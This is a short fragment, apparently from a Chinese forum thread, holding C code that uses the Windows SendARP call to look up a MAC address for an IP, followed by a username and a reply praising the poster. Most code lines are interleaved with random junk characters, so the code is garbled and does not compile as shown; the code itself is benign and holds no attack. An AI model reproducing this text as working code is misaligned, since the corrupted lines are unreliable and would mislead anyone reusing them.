( B; D- e' y9 j# @% f% n9 U{
$ f, I" f0 `, I0 c( B  DWORD  dwRet;
  ULONG  ulLen = 6, pulMac[2];
. g* D, `1 p6 Q+ _5 Y  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
% p3 x) J  v! h9 R1 I) n% |' n  if(dwRet == NO_ERROR)
  {
    memcpy(pMAC, pulMac, 6);
" q" U2 g" l& N) ~$ L    return TRUE;
  G8 R9 a9 [, {2 g1 W+ L1 ]8 r5 r) r+ ~5 C  }
  else return FALSE;
}

wy617958197

大侠好厉害啊